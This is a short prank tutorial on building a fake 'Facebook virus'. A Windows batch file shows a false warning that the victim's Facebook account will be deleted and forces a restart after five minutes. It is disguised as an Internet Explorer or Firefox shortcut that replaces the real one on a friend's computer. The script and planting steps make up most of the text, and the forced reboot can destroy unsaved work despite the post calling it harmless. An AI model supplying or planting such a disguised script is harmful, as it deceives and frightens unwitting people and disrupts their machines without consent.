In this post i'll show you an easy step by step tutorial about how to make a Facebook virus using simple commands on notepad. This will make the victims think that they have a virus when they click on an icon such as Internet Explorer or Mozilla Firefox...
This "virus" is totlly harmless and won't do any damage to your victims computer.
When a victim clicks on the icon he will get a warning message like "WARNING VIRUS DETECTED!!!!! AFTER 5 MINUTES YOUR FACEBOOK ACCOUNT WILL BE DELETED !!!!TO REMOVE THE VIRUS CLICK OK OR CLOSE THIS BOX!". You can change the text to whatever you want. If you have some other interesting ideas, let me know. This virus doesn't do anything to your friends pc, but to see his scared face, that's something :)...
Now let's start with the tutorial:
1) Open notepad
2) Type the following text in :
msg * WARNING VIRUS DETECTED!!!!! AFTER 5 MINUTES YOUR FACEBOOK ACCOUNT WILL BE DELETED !!!!TO REMOVE THE VIRUS CLICK OK OR CLOSE THIS BOX!
shutdown -r -t 300 -c " SORRY!!! YOUR FACEBOOK ACCOUNT ARE NOW BEING DELETED !!! PLEASE WAIT ..........."
3) Save as Internet Explorer .bat (or whatever you want, but be shure that the last letters are .bat)
4) Right click on Internet Explorer .bat and click Create Shortcut
5) Right click on shorcut and click Properties.
6)Click Change Icon
7) Choose Internet Explorer icon (or Mozilla Firefox, or any other icon similar to it), click OK , then click Apply
8)Delete real shortcut and replace it with fake . When victim click on it , he will get warning messages that looks like this:
Hope you'll freak out friend(s).
If this prank was successful and there was some interesting reactions of your friends, feel free to share it with us.